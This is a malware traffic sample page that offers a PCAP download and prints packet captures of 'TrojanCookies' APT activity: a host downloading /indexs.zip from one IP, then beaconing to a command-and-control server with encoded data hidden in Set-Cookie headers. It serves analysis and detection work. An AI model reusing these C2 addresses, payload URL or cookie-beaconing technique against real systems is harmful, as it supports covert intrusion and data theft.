APT TrojanCookies Malware Traffic Sample Trojan PCAP Download

By | January 29, 2016

Download TrojanCookies APT PCAP Sample: trojancookies.pcap

 

2013-01-05 22:41:53.771374 IP 172.16.253.130.1092 > 117.55.241.58.80: Flags [P.], seq 1:280, ack 1, win 64240, length 279: HTTP: GET /indexs.zip HTTP/1.1
E..?.a@….R….u7.:.D.P…\..A P…S…GET /indexs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 117.55.241.58
Connection: Keep-Alive
2013-01-05 22:41:53.771571 IP 117.55.241.58.80 > 172.16.253.130.1092: Flags [.], ack 280, win 64240, length 0
E..(-]…..mu7.:…..P.D..A …sP………….
2013-01-05 22:41:54.094611 IP 117.55.241.58.80 > 172.16.253.130.1092: Flags [P.], seq 1:1461, ack 280, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E…-^……u7.:…..P.D..A …sP…….HTTP/1.1 200 OK
Content-Length: 114696
Content-Type: application/x-zip-compressed
Last-Modified: Thu, 24 Jan 2013 07:08:57 GMT
Accept-Ranges: bytes
ETag: "36c67bad1facd1:1c6d3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 30 Jan 2013 03:34:42 GMT

2013-01-05 22:41:57.398529 IP 172.16.253.130.1093 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…m…….)
.E.P.`……P…….GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: AQ8cIykwOUBGTVRaZGpxd37VYTR4d1mOKAnsKi5caRjlbe8Dnh66ZuvW9XyoBCJGTSRWPigvIUHsIR3KjiXZNqeIjqyoUwJPSMohKy+8+p0ugEk2gnrQvSJKWfkuLamQov0ILFxX//BehMNEX3P4sOrSF4JKBvtaAQaBTA1/PaelJ17yqMkdURSqcR7snK6L7gAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache

2013-01-05 22:41:58.609637 IP 172.16.253.130.1094 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…m…….)
.F.P7.D…m.P….\..GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: AS5FUmNzg5CdscHO3Oz5CRbgmGZDAAnR7DFrbz9E22Ec8Fm3TRQV0fMySmECZO4MJct0A/K6WUNPeWyWYN7e91aeoWH5nVS2DtVtnY7ZVqj5SBHaCmHn2Ipqxu5PTcJvpaTJYehJMefihOCyJgJjaFZDPOUi2c/I2sqYIh6vJk2YuTNwQtHwNjgstq58DxYTjgAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache

2013-01-05 22:41:59.422085 IP 172.16.253.1.17500 > 172.16.253.255.17500: UDP, length 321
E..]….@………..D\D\.I..{"host_int": 356675228, "version": [1, 8], "displayname": "356675228", "port": 17500, "namespaces": [173402115, 221980425, 81434131, 169597399, 23578136, 115911321, 206074398, 165474655, 89292257, 26249186, 69806233, 87070436, 98532453, 102394472, 68274857, 125331760, 93464947, 87860457, 164806200, 83940796, 139226175]}
2013-01-05 22:41:59.703740 IP 172.16.253.130.1095 > 184.22.41.10.80: Flags [S], seq 209564213, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…ok……)
.G.P.}.5….p…:1……….
2013-01-05 22:41:59.811449 IP 184.22.41.10.80 > 172.16.253.130.1095: Flags [S.], seq 2093017231, ack 209564214, win 64240, options [mss 1460], length 0
E..,-……`..)
…..P.G|….}.6`………….
2013-01-05 22:41:59.811507 IP 172.16.253.130.1095 > 184.22.41.10.80: Flags [.], ack 1, win 64240, length 0
E..(..@…or……)
.G.P.}.6|…P…….
2013-01-05 22:41:59.811859 IP 172.16.253.130.1095 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…m…….)
.G.P.}.6|…P…….GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: Aej4BRIfLDZDUF1qd4GOm6V0pE/nx2gMQgXnTabLrDG/gIVTURAa6iAdP5+uybCFbWBsTi99Ceg0paBJIJJ8SwJ/jRmTSHDoupkThSRwTsNJkwR8wfyR8YV+1xD8iz+kzR1CtrfR7olzp2dsnp+Wgyu1WCjeo7bsMG4nGq6DHAyFi2qk/Rzh5YLoM+bwQN2+ZgAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache

 

2013-01-05 22:42:29.443499 IP 172.16.253.1.17500 > 172.16.253.255.17500: UDP, length 321
E..]….@..m……..D\D\.I..{"host_int": 356675228, "version": [1, 8], "displayname": "356675228", "port": 17500, "namespaces": [173402115, 221980425, 81434131, 169597399, 23578136, 115911321, 206074398, 165474655, 89292257, 26249186, 69806233, 87070436, 98532453, 102394472, 68274857, 125331760, 93464947, 87860457, 164806200, 83940796, 139226175]}
2013-01-05 22:42:30.173010 IP 172.16.253.130.1104 > 184.22.41.10.80: Flags [S], seq 1965195895, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…oN……)
.P.Pu”.w….p….A……….
2013-01-05 22:42:30.280498 IP 184.22.41.10.80 > 172.16.253.130.1104: Flags [S.], seq 3239884347, ack 1965195896, win 64240, options [mss 1460], length 0
E..,-……G..)
…..P.P…;u”.x`………….
2013-01-05 22:42:30.280566 IP 172.16.253.130.1104 > 184.22.41.10.80: Flags [.], ack 1, win 64240, length 0
E..(..@…oU……)
.P.Pu”.x…<P…….
2013-01-05 22:42:30.280868 IP 172.16.253.130.1104 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…mp……)
.P.Pu”.x…<P…….GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: AR0uO0RRX2h1f4yZo7C9x9QYPVyZXtpP+RD9ajqe1y4uj2IpzAeer9zbGYcLK2X7whwmbN3qvn023RzcnGBgL95kqq62vc/yFd8TnWFxQRysDDYxTmW91Xdpjo8UWn8wB6m1AiWaS5Ya4e0WTCFlCE4Yep6yro43ijU8tUpocsHX5OK3zQ4s1Qb7TAIAuhdumAAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache
